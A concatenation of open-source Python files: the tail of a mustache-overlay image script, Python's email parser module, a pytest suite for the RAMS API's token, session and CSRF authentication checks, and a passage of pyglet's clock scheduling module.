nose = noses[0] # get the biggest
# these get the upper left corner of the face/nose with respect to original image
xf = face.x -(face.width()/2)
yf = face.y -(face.height()/2)
xm = nose.x -(nose.width()/2)
ym = nose.y -(nose.height()/2)
#calculate the mustache position
xmust = xf+xm-(stache.width/2)+(nose.width()/2)
ymust = yf+ym+(2*nose.height()/3)
#blit the stache/mask onto the image
img = img.blit(stache,pos=(xmust,ymust),mask = mask)
img.save(display) #display
| bsd-3-clause |
ArneBab/pypyjs | website/demo/home/rfk/repos/pypy/lib-python/2.7/email/parser.py | 392 | 3300 | # Copyright (C) 2001-2006 Python Software Foundation
# Author: Barry Warsaw, Thomas Wouters, Anthony Baxter
# Contact: [email protected]
"""A parser of RFC 2822 and MIME email messages."""
__all__ = ['Parser', 'HeaderParser']
import warnings
from cStringIO import StringIO
from email.feedparser import FeedParser
from email.message import Message
class Parser:
def __init__(self, *args, **kws):
"""Parser of RFC 2822 and MIME email messages.
Creates an in-memory object tree representing the email message, which
can then be manipulated and turned over to a Generator to return the
textual representation of the message.
The string must be formatted as a block of RFC 2822 headers and header
        continuation lines, optionally preceded by a `Unix-from' header. The
header block is terminated either by the end of the string or by a
blank line.
_class is the class to instantiate for new message objects when they
must be created. This class must have a constructor that can take
zero arguments. Default is Message.Message.
"""
if len(args) >= 1:
if '_class' in kws:
raise TypeError("Multiple values for keyword arg '_class'")
kws['_class'] = args[0]
if len(args) == 2:
if 'strict' in kws:
raise TypeError("Multiple values for keyword arg 'strict'")
kws['strict'] = args[1]
if len(args) > 2:
raise TypeError('Too many arguments')
if '_class' in kws:
self._class = kws['_class']
del kws['_class']
else:
self._class = Message
if 'strict' in kws:
warnings.warn("'strict' argument is deprecated (and ignored)",
DeprecationWarning, 2)
del kws['strict']
if kws:
raise TypeError('Unexpected keyword arguments')
def parse(self, fp, headersonly=False):
"""Create a message structure from the data in a file.
Reads all the data from the file and returns the root of the message
structure. Optional headersonly is a flag specifying whether to stop
parsing after reading the headers or not. The default is False,
meaning it parses the entire contents of the file.
"""
feedparser = FeedParser(self._class)
if headersonly:
feedparser._set_headersonly()
while True:
data = fp.read(8192)
if not data:
break
feedparser.feed(data)
return feedparser.close()
def parsestr(self, text, headersonly=False):
"""Create a message structure from a string.
Returns the root of the message structure. Optional headersonly is a
flag specifying whether to stop parsing after reading the headers or
not. The default is False, meaning it parses the entire contents of
the file.
"""
return self.parse(StringIO(text), headersonly=headersonly)
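# Usage sketch (HeaderParser below shares the same API but stops after the
# headers):
#   msg = Parser().parsestr('Subject: hi\n\nbody')
#   msg['subject']   # -> 'hi'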
class HeaderParser(Parser):
def parse(self, fp, headersonly=True):
return Parser.parse(self, fp, True)
def parsestr(self, text, headersonly=True):
return Parser.parsestr(self, text, True)
| mit |
RAMSProject/rams | uber/tests/test_api.py | 1 | 16626 | import pytest
from cherrypy import HTTPError
from uber.common import *
from uber.tests.conftest import csrf_token, cp_session
from uber.api import auth_by_token, auth_by_session, api_auth, all_api_auth
VALID_API_TOKEN = '39074db3-9295-447a-b831-8cbaa93a0522'
@pytest.fixture()
def session():
with Session() as session:
yield session
@pytest.fixture()
def admin_account(monkeypatch, session):
admin_account = AdminAccount(attendee=Attendee())
session.add(admin_account)
session.commit()
session.refresh(admin_account)
monkeypatch.setitem(cherrypy.session, 'account_id', admin_account.id)
yield admin_account
cherrypy.session['account_id'] = None
session.delete(admin_account)
@pytest.fixture()
def api_token(session, admin_account):
api_token = ApiToken(
admin_account=admin_account,
token=VALID_API_TOKEN)
session.add(api_token)
session.commit()
session.refresh(api_token)
yield api_token
session.delete(api_token)
class TestCheckAdminAccount(object):
ACCESS_ERR = 'You do not have permission to change that access setting'
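    # Each row below is (the acting admin's own access, the access being set
    # on another account, the message check() is expected to return).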
TEST_ACCESS_CHANGES = [
([], [], None),
([], [c.ADMIN], ACCESS_ERR),
([], [c.ACCOUNTS], ACCESS_ERR),
([], [c.PEOPLE], ACCESS_ERR),
([], [c.ADMIN, c.PEOPLE], ACCESS_ERR),
([], [c.ADMIN, c.ACCOUNTS], ACCESS_ERR),
([], [c.ADMIN, c.ACCOUNTS, c.PEOPLE], ACCESS_ERR),
([], [c.ACCOUNTS, c.PEOPLE], ACCESS_ERR),
([c.ADMIN], [], None),
([c.ADMIN], [c.ADMIN], None),
([c.ADMIN], [c.ACCOUNTS], None),
([c.ADMIN], [c.PEOPLE], None),
([c.ADMIN], [c.ADMIN, c.PEOPLE], None),
([c.ADMIN], [c.ADMIN, c.ACCOUNTS], None),
([c.ADMIN], [c.ADMIN, c.ACCOUNTS, c.PEOPLE], None),
([c.ADMIN], [c.ACCOUNTS, c.PEOPLE], None),
([c.ACCOUNTS], [], None),
([c.ACCOUNTS], [c.ADMIN], ACCESS_ERR),
([c.ACCOUNTS], [c.ACCOUNTS], None),
([c.ACCOUNTS], [c.PEOPLE], None),
([c.ACCOUNTS], [c.ADMIN, c.PEOPLE], ACCESS_ERR),
([c.ACCOUNTS], [c.ADMIN, c.ACCOUNTS], ACCESS_ERR),
([c.ACCOUNTS], [c.ADMIN, c.ACCOUNTS, c.PEOPLE], ACCESS_ERR),
([c.ACCOUNTS], [c.ACCOUNTS, c.PEOPLE], None),
([c.PEOPLE], [], None),
([c.PEOPLE], [c.ADMIN], ACCESS_ERR),
([c.PEOPLE], [c.ACCOUNTS], ACCESS_ERR),
([c.PEOPLE], [c.PEOPLE], None),
([c.PEOPLE], [c.ADMIN, c.PEOPLE], ACCESS_ERR),
([c.PEOPLE], [c.ADMIN, c.ACCOUNTS], ACCESS_ERR),
([c.PEOPLE], [c.ADMIN, c.ACCOUNTS, c.PEOPLE], ACCESS_ERR),
([c.PEOPLE], [c.ACCOUNTS, c.PEOPLE], ACCESS_ERR),
([c.ADMIN, c.PEOPLE], [], None),
([c.ADMIN, c.PEOPLE], [c.ADMIN], None),
([c.ADMIN, c.PEOPLE], [c.ACCOUNTS], None),
([c.ADMIN, c.PEOPLE], [c.PEOPLE], None),
([c.ADMIN, c.PEOPLE], [c.ADMIN, c.PEOPLE], None),
([c.ADMIN, c.PEOPLE], [c.ADMIN, c.ACCOUNTS], None),
([c.ADMIN, c.PEOPLE], [c.ADMIN, c.ACCOUNTS, c.PEOPLE], None),
([c.ADMIN, c.PEOPLE], [c.ACCOUNTS, c.PEOPLE], None),
([c.ACCOUNTS, c.PEOPLE], [], None),
([c.ACCOUNTS, c.PEOPLE], [c.ADMIN], ACCESS_ERR),
([c.ACCOUNTS, c.PEOPLE], [c.ACCOUNTS], None),
([c.ACCOUNTS, c.PEOPLE], [c.PEOPLE], None),
([c.ACCOUNTS, c.PEOPLE], [c.ADMIN, c.PEOPLE], ACCESS_ERR),
([c.ACCOUNTS, c.PEOPLE], [c.ADMIN, c.ACCOUNTS], ACCESS_ERR),
([c.ACCOUNTS, c.PEOPLE], [c.ADMIN, c.ACCOUNTS, c.PEOPLE], ACCESS_ERR),
([c.ACCOUNTS, c.PEOPLE], [c.ACCOUNTS, c.PEOPLE], None),
]
@pytest.mark.parametrize('admin_access,access_changes,expected', TEST_ACCESS_CHANGES)
def test_check_admin_account_access_new(self, session, admin_account, admin_access, access_changes, expected):
admin_access = ','.join(map(str, admin_access))
access_changes = ','.join(map(str, access_changes))
admin_account.access = admin_access
session.commit()
session.refresh(admin_account)
test_attendee = Attendee(email='[email protected]')
session.add(test_attendee)
session.commit()
test_admin_account = AdminAccount(
access=access_changes,
attendee_id=test_attendee.id,
hashed='<bcrypted>')
message = check(test_admin_account)
assert message == expected
@pytest.mark.parametrize('admin_access,access_changes,expected', TEST_ACCESS_CHANGES)
def test_check_admin_account_access_remove(self, session, admin_account, admin_access, access_changes, expected):
admin_access = ','.join(map(str, admin_access))
access_changes = ','.join(map(str, access_changes))
admin_account.access = admin_access
session.commit()
session.refresh(admin_account)
test_attendee = Attendee(email='[email protected]')
session.add(test_attendee)
test_admin_account = AdminAccount(
access=access_changes,
attendee_id=test_attendee.id,
hashed='<bcrypted>')
session.add(test_admin_account)
session.commit()
session.refresh(test_admin_account)
test_admin_account.access = ''
message = check(test_admin_account)
assert message == expected
@pytest.mark.parametrize('admin_access,access_changes,expected', TEST_ACCESS_CHANGES)
def test_check_admin_account_access_add(self, session, admin_account, admin_access, access_changes, expected):
admin_access = ','.join(map(str, admin_access))
access_changes = ','.join(map(str, access_changes))
admin_account.access = admin_access
session.commit()
session.refresh(admin_account)
test_attendee = Attendee(email='[email protected]')
session.add(test_attendee)
test_admin_account = AdminAccount(
access='',
attendee_id=test_attendee.id,
hashed='<bcrypted>')
session.add(test_admin_account)
session.commit()
session.refresh(test_admin_account)
test_admin_account.access = access_changes
message = check(test_admin_account)
        assert message == expected
class TestAuthByToken(object):
ACCESS_ERR = 'Insufficient access for auth token: {}'.format(VALID_API_TOKEN)
def test_success(self, monkeypatch, api_token):
monkeypatch.setitem(cherrypy.request.headers, 'X-Auth-Token', api_token.token)
assert None == auth_by_token(set())
@pytest.mark.parametrize('token,expected', [
(None, (401, 'Missing X-Auth-Token header')),
('XXXX', (403, 'Invalid auth token, badly formed hexadecimal UUID string: XXXX')),
('b6531a2b-eddf-4d08-9afe-0ced6376078c', (403, 'Auth token not recognized: b6531a2b-eddf-4d08-9afe-0ced6376078c')),
])
def test_failure(self, monkeypatch, token, expected):
monkeypatch.setitem(cherrypy.request.headers, 'X-Auth-Token', token)
assert auth_by_token(set()) == expected
def test_revoked(self, monkeypatch, session, api_token):
api_token.revoked_time = datetime.utcnow().replace(tzinfo=pytz.UTC)
session.commit()
session.refresh(api_token)
monkeypatch.setitem(cherrypy.request.headers, 'X-Auth-Token', api_token.token)
assert auth_by_token(set()) == (403, 'Revoked auth token: {}'.format(api_token.token))
@pytest.mark.parametrize('token_access,required_access,expected', [
([], [], None),
([], [c.API_READ], (403, ACCESS_ERR)),
([], [c.API_READ, c.API_UPDATE], (403, ACCESS_ERR)),
([c.API_READ], [], None),
([c.API_READ], [c.API_READ], None),
([c.API_READ], [c.API_READ, c.API_UPDATE], (403, ACCESS_ERR)),
([c.API_READ, c.API_UPDATE], [c.API_READ, c.API_UPDATE], None),
])
def test_insufficient_access(self, monkeypatch, session, api_token, token_access, required_access, expected):
api_token.access = ','.join(map(str, token_access))
session.commit()
session.refresh(api_token)
monkeypatch.setitem(cherrypy.request.headers, 'X-Auth-Token', api_token.token)
assert auth_by_token(set(required_access)) == expected
class TestAuthBySession(object):
ACCESS_ERR = 'Insufficient access for admin account'
def test_success(self, admin_account, csrf_token):
assert None == auth_by_session(set())
def test_check_csrf_missing_from_headers(self):
assert auth_by_session(set()) == (403, 'Your CSRF token is invalid. Please go back and try again.')
def test_check_csrf_missing_from_session(self, monkeypatch):
monkeypatch.setitem(cherrypy.request.headers, 'CSRF-Token', 'XXXX')
with pytest.raises(KeyError) as error:
auth_by_session(set())
def test_check_csrf_invalid(self, monkeypatch):
monkeypatch.setitem(cherrypy.session, 'csrf_token', '74c18d5c-1a92-40f0-b5f3-924d46efafe4')
monkeypatch.setitem(cherrypy.request.headers, 'CSRF-Token', 'XXXX')
assert auth_by_session(set()) == (403, 'Your CSRF token is invalid. Please go back and try again.')
def test_missing_admin_account(self, monkeypatch):
monkeypatch.setitem(cherrypy.session, 'csrf_token', '74c18d5c-1a92-40f0-b5f3-924d46efafe4')
monkeypatch.setitem(cherrypy.request.headers, 'CSRF-Token', '74c18d5c-1a92-40f0-b5f3-924d46efafe4')
assert auth_by_session(set()) == (403, 'Missing admin account in session')
def test_invalid_admin_account(self, monkeypatch):
monkeypatch.setitem(cherrypy.session, 'account_id', '4abd6dd4-8da3-44dc-8074-b2fc1b73185f')
monkeypatch.setitem(cherrypy.session, 'csrf_token', '74c18d5c-1a92-40f0-b5f3-924d46efafe4')
monkeypatch.setitem(cherrypy.request.headers, 'CSRF-Token', '74c18d5c-1a92-40f0-b5f3-924d46efafe4')
assert auth_by_session(set()) == (403, 'Invalid admin account in session')
@pytest.mark.parametrize('admin_access,required_access,expected', [
([], [], None),
([], [c.API_READ], (403, ACCESS_ERR)),
([], [c.API_READ, c.API_UPDATE], (403, ACCESS_ERR)),
([c.API_READ], [], None),
([c.API_READ], [c.API_READ], None),
([c.API_READ], [c.API_READ, c.API_UPDATE], (403, ACCESS_ERR)),
([c.API_READ, c.API_UPDATE], [c.API_READ, c.API_UPDATE], None),
])
def test_insufficient_access(self, monkeypatch, session, admin_account, admin_access, required_access, expected):
admin_account.access = ','.join(map(str, admin_access))
session.commit()
session.refresh(admin_account)
monkeypatch.setitem(cherrypy.session, 'account_id', admin_account.id)
monkeypatch.setitem(cherrypy.session, 'csrf_token', '74c18d5c-1a92-40f0-b5f3-924d46efafe4')
monkeypatch.setitem(cherrypy.request.headers, 'CSRF-Token', '74c18d5c-1a92-40f0-b5f3-924d46efafe4')
assert auth_by_session(set(required_access)) == expected
class TestApiAuth(object):
AUTH_BY_SESSION_ERR = 'Missing X-Auth-Token header'
AUTH_BY_TOKEN_ERR = 'Insufficient access for auth token'
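    # Each case is (access granted to the credential, access required by
    # the endpoint, whether an HTTPError is expected).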
TEST_REQUIRED_ACCESS = [
([], [], False),
([], [c.API_READ], True),
([], [c.API_READ, c.API_UPDATE], True),
([c.API_READ], [], False),
([c.API_READ], [c.API_READ], False),
([c.API_READ], [c.API_READ, c.API_UPDATE], True),
([c.API_READ, c.API_UPDATE], [c.API_READ, c.API_UPDATE], False),
]
@pytest.mark.parametrize('admin_access,required_access,expected', TEST_REQUIRED_ACCESS)
def test_api_auth_by_session(self, monkeypatch, session, admin_account, admin_access, required_access, expected):
@api_auth(*required_access)
def _func():
return 'SUCCESS'
admin_account.access = ','.join(map(str, admin_access))
session.commit()
session.refresh(admin_account)
monkeypatch.setitem(cherrypy.session, 'account_id', admin_account.id)
monkeypatch.setitem(cherrypy.session, 'csrf_token', '74c18d5c-1a92-40f0-b5f3-924d46efafe4')
monkeypatch.setitem(cherrypy.request.headers, 'CSRF-Token', '74c18d5c-1a92-40f0-b5f3-924d46efafe4')
if expected:
with pytest.raises(HTTPError) as error:
_func()
assert error.type is HTTPError
assert error.value.code == 401
assert error.value._message.startswith(self.AUTH_BY_SESSION_ERR)
else:
assert 'SUCCESS' == _func()
@pytest.mark.parametrize('token_access,required_access,expected', TEST_REQUIRED_ACCESS)
def test_api_auth_by_token(self, monkeypatch, session, api_token, token_access, required_access, expected):
@api_auth(*required_access)
def _func():
return 'SUCCESS'
api_token.access = ','.join(map(str, token_access))
session.commit()
session.refresh(api_token)
monkeypatch.setitem(cherrypy.request.headers, 'X-Auth-Token', api_token.token)
if expected:
with pytest.raises(HTTPError) as error:
_func()
assert error.type is HTTPError
assert error.value.code == 403
assert error.value._message.startswith(self.AUTH_BY_TOKEN_ERR)
else:
assert 'SUCCESS' == _func()
class TestAllApiAuth(object):
AUTH_BY_SESSION_ERR = 'Missing X-Auth-Token header'
AUTH_BY_TOKEN_ERR = 'Insufficient access for auth token'
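    # Same (granted, required, error expected) cases as TestApiAuth, but
    # exercised through the class-level decorator.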
TEST_REQUIRED_ACCESS = [
([], [], False),
([], [c.API_READ], True),
([], [c.API_READ, c.API_UPDATE], True),
([c.API_READ], [], False),
([c.API_READ], [c.API_READ], False),
([c.API_READ], [c.API_READ, c.API_UPDATE], True),
([c.API_READ, c.API_UPDATE], [c.API_READ, c.API_UPDATE], False),
]
@pytest.mark.parametrize('admin_access,required_access,expected', TEST_REQUIRED_ACCESS)
def test_all_api_auth_by_session(self, monkeypatch, session, admin_account, admin_access, required_access, expected):
@all_api_auth(*required_access)
class Service(object):
def func_1(self):
return 'SUCCESS1'
def func_2(self):
return 'SUCCESS2'
service = Service()
admin_account.access = ','.join(map(str, admin_access))
session.commit()
session.refresh(admin_account)
monkeypatch.setitem(cherrypy.session, 'account_id', admin_account.id)
monkeypatch.setitem(cherrypy.session, 'csrf_token', '74c18d5c-1a92-40f0-b5f3-924d46efafe4')
monkeypatch.setitem(cherrypy.request.headers, 'CSRF-Token', '74c18d5c-1a92-40f0-b5f3-924d46efafe4')
if expected:
with pytest.raises(HTTPError) as error:
service.func_1()
assert error.type is HTTPError
assert error.value.code == 401
assert error.value._message.startswith(self.AUTH_BY_SESSION_ERR)
else:
assert 'SUCCESS1' == service.func_1()
if expected:
with pytest.raises(HTTPError) as error:
service.func_2()
assert error.type is HTTPError
assert error.value.code == 401
assert error.value._message.startswith(self.AUTH_BY_SESSION_ERR)
else:
assert 'SUCCESS2' == service.func_2()
@pytest.mark.parametrize('token_access,required_access,expected', TEST_REQUIRED_ACCESS)
def test_all_api_auth_by_token(self, monkeypatch, session, api_token, token_access, required_access, expected):
@all_api_auth(*required_access)
class Service(object):
def func_1(self):
return 'SUCCESS1'
def func_2(self):
return 'SUCCESS2'
service = Service()
api_token.access = ','.join(map(str, token_access))
session.commit()
session.refresh(api_token)
monkeypatch.setitem(cherrypy.request.headers, 'X-Auth-Token', api_token.token)
if expected:
with pytest.raises(HTTPError) as error:
service.func_1()
assert error.type is HTTPError
assert error.value.code == 403
assert error.value._message.startswith(self.AUTH_BY_TOKEN_ERR)
else:
assert 'SUCCESS1' == service.func_1()
if expected:
with pytest.raises(HTTPError) as error:
service.func_2()
assert error.type is HTTPError
assert error.value.code == 403
assert error.value._message.startswith(self.AUTH_BY_TOKEN_ERR)
else:
assert 'SUCCESS2' == service.func_2()
| agpl-3.0 |
cledio66/pyglet | pyglet/clock.py | 21 | 34511 | # ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''Precise framerate calculation, scheduling and framerate limiting.
Measuring time
==============
The `tick` and `get_fps` functions can be used in conjunction to fulfil most
games' basic requirements::
from pyglet import clock
while True:
dt = clock.tick()
# ... update and render ...
print 'FPS is %f' % clock.get_fps()
The ``dt`` value returned gives the number of seconds (as a float) since the
last "tick".
The `get_fps` function averages the framerate over a sliding window of
approximately 1 second. (You can calculate the instantaneous framerate by
taking the reciprocal of ``dt``).
Always remember to `tick` the clock!
Limiting frame-rate
===================
The framerate can be limited::
clock.set_fps_limit(60)
This causes `clock` to sleep during each `tick` in an attempt to keep the
number of ticks (frames) per second below 60.
The implementation uses platform-dependent high-resolution sleep functions
to achieve better accuracy with busy-waiting than would be possible using
just the `time` module.
Scheduling
==========
You can schedule a function to be called every time the clock is ticked::
def callback(dt):
print '%f seconds since last callback' % dt
clock.schedule(callback)
The `schedule_interval` method causes a function to be called every "n"
seconds::
clock.schedule_interval(callback, .5) # called twice a second
The `schedule_once` method causes a function to be called once "n" seconds
in the future::
clock.schedule_once(callback, 5) # called in 5 seconds
All of the `schedule` methods will pass on any additional args or keyword args
you specify to the callback function::
def animate(dt, velocity, sprite):
sprite.position += dt * velocity
clock.schedule(animate, velocity=5.0, sprite=alien)
You can cancel a function scheduled with any of these methods using
`unschedule`::
clock.unschedule(animate)
Displaying FPS
==============
The ClockDisplay class provides a simple FPS counter. You should create
an instance of ClockDisplay once during the application's start up::
fps_display = clock.ClockDisplay()
Call draw on the ClockDisplay object for each frame::
fps_display.draw()
There are several options to change the font, color and text displayed
within the __init__ method.
Using multiple clocks
=====================
The clock functions are all relayed to an instance of `Clock` which is
initialised with the module. You can get this instance to use directly::
clk = clock.get_default()
You can also replace the default clock with your own:
myclk = clock.Clock()
clock.set_default(myclk)
Each clock maintains its own set of scheduled functions and FPS
limiting/measurement. Each clock must be "ticked" separately.
Multiple and derived clocks potentially allow you to separate "game-time" and
"wall-time", or to synchronise your clock to an audio or video stream instead
of the system clock.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import time
import ctypes
import pyglet.lib
from pyglet import compat_platform
if compat_platform in ('win32', 'cygwin'):
# Win32 Sleep function is only 10-millisecond resolution, so instead
# use a waitable timer object, which has up to 100-nanosecond resolution
# (hardware and implementation dependent, of course).
_kernel32 = ctypes.windll.kernel32
class _ClockBase(object):
def __init__(self):
self._timer = _kernel32.CreateWaitableTimerA(None, True, None)
def sleep(self, microseconds):
delay = ctypes.c_longlong(int(-microseconds * 10))
_kernel32.SetWaitableTimer(self._timer, ctypes.byref(delay),
0, ctypes.c_void_p(), ctypes.c_void_p(), False)
_kernel32.WaitForSingleObject(self._timer, 0xffffffff)
_default_time_function = time.clock
else:
_c = pyglet.lib.load_library('c')
_c.usleep.argtypes = [ctypes.c_ulong]
class _ClockBase(object):
def sleep(self, microseconds):
_c.usleep(int(microseconds))
_default_time_function = time.time
class _ScheduledItem(object):
__slots__ = ['func', 'args', 'kwargs']
def __init__(self, func, args, kwargs):
self.func = func
self.args = args
self.kwargs = kwargs
class _ScheduledIntervalItem(object):
__slots__ = ['func', 'interval', 'last_ts', 'next_ts',
'args', 'kwargs']
def __init__(self, func, interval, last_ts, next_ts, args, kwargs):
self.func = func
self.interval = interval
self.last_ts = last_ts
self.next_ts = next_ts
self.args = args
self.kwargs = kwargs
def _dummy_schedule_func(*args, **kwargs):
'''Dummy function that does nothing, placed onto zombie scheduled items
to ensure they have no side effect if already queued inside tick() method.
'''
pass
class Clock(_ClockBase):
'''Class for calculating and limiting framerate, and for calling scheduled
functions.
'''
#: The minimum amount of time in seconds this clock will attempt to sleep
#: for when framerate limiting. Higher values will increase the
#: accuracy of the limiting but also increase CPU usage while
#: busy-waiting. Lower values mean the process sleeps more often, but is
#: prone to over-sleep and run at a potentially lower or uneven framerate
#: than desired.
MIN_SLEEP = 0.005
#: The amount of time in seconds this clock subtracts from sleep values
#: to compensate for lazy operating systems.
SLEEP_UNDERSHOOT = MIN_SLEEP - 0.001
# List of functions to call every tick.
_schedule_items = None
# List of schedule interval items kept in sort order.
_schedule_interval_items = None
# If True, a sleep(0) is inserted on every tick.
_force_sleep = False
def __init__(self, fps_limit=None, time_function=_default_time_function):
'''Initialise a Clock, with optional framerate limit and custom
time function.
:Parameters:
`fps_limit` : float
If not None, the maximum allowable framerate. Defaults
to None. Deprecated in pyglet 1.2.
`time_function` : function
Function to return the elapsed time of the application,
in seconds. Defaults to time.time, but can be replaced
to allow for easy time dilation effects or game pausing.
'''
super(Clock, self).__init__()
self.time = time_function
self.next_ts = self.time()
self.last_ts = None
self.times = []
self.set_fps_limit(fps_limit)
self.cumulative_time = 0
self._schedule_items = []
self._schedule_interval_items = []
def update_time(self):
'''Get the elapsed time since the last call to `update_time`.
This updates the clock's internal measure of time and returns
the difference since the last update (or since the clock was created).
:since: pyglet 1.2
:rtype: float
:return: The number of seconds since the last `update_time`, or 0
if this was the first time it was called.
'''
ts = self.time()
if self.last_ts is None:
delta_t = 0
else:
delta_t = ts - self.last_ts
self.times.insert(0, delta_t)
if len(self.times) > self.window_size:
self.cumulative_time -= self.times.pop()
self.cumulative_time += delta_t
self.last_ts = ts
return delta_t
def call_scheduled_functions(self, dt):
'''Call scheduled functions that elapsed on the last `update_time`.
:since: pyglet 1.2
:Parameters:
dt : float
The elapsed time since the last update to pass to each
scheduled function. This is *not* used to calculate which
functions have elapsed.
:rtype: bool
:return: True if any functions were called, otherwise False.
'''
ts = self.last_ts
result = False
# Call functions scheduled for every frame
        # Dupe list just in case one of the items unschedules itself
for item in list(self._schedule_items):
result = True
item.func(dt, *item.args, **item.kwargs)
# Call all scheduled interval functions and reschedule for future.
need_resort = False
        # Dupe list just in case one of the items unschedules itself
for item in list(self._schedule_interval_items):
if item.next_ts > ts:
break
result = True
item.func(ts - item.last_ts, *item.args, **item.kwargs)
if item.interval:
# Try to keep timing regular, even if overslept this time;
# but don't schedule in the past (which could lead to
                # infinitely-worsening error).
item.next_ts = item.last_ts + item.interval
item.last_ts = ts
if item.next_ts <= ts:
if ts - item.next_ts < 0.05:
# Only missed by a little bit, keep the same schedule
item.next_ts = ts + item.interval
else:
# Missed by heaps, do a soft reschedule to avoid
# lumping everything together.
item.next_ts = self._get_soft_next_ts(ts, item.interval)
# Fake last_ts to avoid repeatedly over-scheduling in
# future. Unfortunately means the next reported dt is
# incorrect (looks like interval but actually isn't).
item.last_ts = item.next_ts - item.interval
need_resort = True
else:
item.next_ts = None
# Remove finished one-shots.
self._schedule_interval_items = \
[item for item in self._schedule_interval_items \
if item.next_ts is not None]
if need_resort:
# TODO bubble up changed items might be faster
self._schedule_interval_items.sort(key=lambda a: a.next_ts)
return result
def tick(self, poll=False):
'''Signify that one frame has passed.
This will call any scheduled functions that have elapsed.
:Parameters:
`poll` : bool
If True, the function will call any scheduled functions
but will not sleep or busy-wait for any reason. Recommended
for advanced applications managing their own sleep timers
only.
Since pyglet 1.1.
:rtype: float
:return: The number of seconds since the last "tick", or 0 if this was
the first frame.
'''
if poll:
if self.period_limit:
self.next_ts = self.next_ts + self.period_limit
else:
if self.period_limit:
self._limit()
if self._force_sleep:
self.sleep(0)
delta_t = self.update_time()
self.call_scheduled_functions(delta_t)
return delta_t
def _limit(self):
'''Sleep until the next frame is due. Called automatically by
`tick` if a framerate limit has been set.
This method uses several heuristics to determine whether to
sleep or busy-wait (or both).
'''
ts = self.time()
# Sleep to just before the desired time
sleeptime = self.get_sleep_time(False)
while sleeptime - self.SLEEP_UNDERSHOOT > self.MIN_SLEEP:
self.sleep(1000000 * (sleeptime - self.SLEEP_UNDERSHOOT))
sleeptime = self.get_sleep_time(False)
# Busy-loop CPU to get closest to the mark
sleeptime = self.next_ts - self.time()
while sleeptime > 0:
sleeptime = self.next_ts - self.time()
if sleeptime < -2 * self.period_limit:
# Missed the time by a long shot, let's reset the clock
# print >> sys.stderr, 'Step %f' % -sleeptime
self.next_ts = ts + 2 * self.period_limit
else:
# Otherwise keep the clock steady
self.next_ts = self.next_ts + self.period_limit
def get_sleep_time(self, sleep_idle):
'''Get the time until the next item is scheduled.
This method considers all scheduled items and the current
``fps_limit``, if any.
Applications can choose to continue receiving updates at the
maximum framerate during idle time (when no functions are scheduled),
or they can sleep through their idle time and allow the CPU to
switch to other processes or run in low-power mode.
If `sleep_idle` is ``True`` the latter behaviour is selected, and
``None`` will be returned if there are no scheduled items.
Otherwise, if `sleep_idle` is ``False``, a sleep time allowing
the maximum possible framerate (considering ``fps_limit``) will
be returned; or an earlier time if a scheduled function is ready.
:Parameters:
`sleep_idle` : bool
If True, the application intends to sleep through its idle
time; otherwise it will continue ticking at the maximum
frame rate allowed.
:rtype: float
:return: Time until the next scheduled event in seconds, or ``None``
if there is no event scheduled.
:since: pyglet 1.1
'''
if self._schedule_items or not sleep_idle:
if not self.period_limit:
return 0.
else:
wake_time = self.next_ts
if self._schedule_interval_items:
wake_time = min(wake_time,
self._schedule_interval_items[0].next_ts)
return max(wake_time - self.time(), 0.)
if self._schedule_interval_items:
return max(self._schedule_interval_items[0].next_ts - self.time(),
0)
return None
def set_fps_limit(self, fps_limit):
'''Set the framerate limit.
The framerate limit applies only when a function is scheduled
for every frame. That is, the framerate limit can be exceeded by
scheduling a function for a very small period of time.
:Parameters:
`fps_limit` : float
Maximum frames per second allowed, or None to disable
limiting.
:deprecated: Use `pyglet.app.run` and `schedule_interval` instead.
'''
if not fps_limit:
self.period_limit = None
else:
self.period_limit = 1. / fps_limit
self.window_size = fps_limit or 60
def get_fps_limit(self):
'''Get the framerate limit.
:rtype: float
:return: The framerate limit previously set in the constructor or
            `set_fps_limit`, or 0 if no limit was set.
'''
if self.period_limit:
return 1. / self.period_limit
else:
return 0
def get_fps(self):
'''Get the average FPS of recent history.
The result is the average of a sliding window of the last "n" frames,
where "n" is some number designed to cover approximately 1 second.
:rtype: float
:return: The measured frames per second.
'''
if not self.cumulative_time:
return 0
return len(self.times) / self.cumulative_time
def schedule(self, func, *args, **kwargs):
'''Schedule a function to be called every frame.
The function should have a prototype that includes ``dt`` as the
first argument, which gives the elapsed time, in seconds, since the
last clock tick. Any additional arguments given to this function
are passed on to the callback::
def callback(dt, *args, **kwargs):
pass
:Parameters:
`func` : function
The function to call each frame.
'''
item = _ScheduledItem(func, args, kwargs)
self._schedule_items.append(item)
def _schedule_item(self, func, last_ts, next_ts, interval, *args, **kwargs):
item = _ScheduledIntervalItem(
func, interval, last_ts, next_ts, args, kwargs)
# Insert in sort order
for i, other in enumerate(self._schedule_interval_items):
if other.next_ts is not None and other.next_ts > next_ts:
self._schedule_interval_items.insert(i, item)
break
else:
self._schedule_interval_items.append(item)
def schedule_interval(self, func, interval, *args, **kwargs):
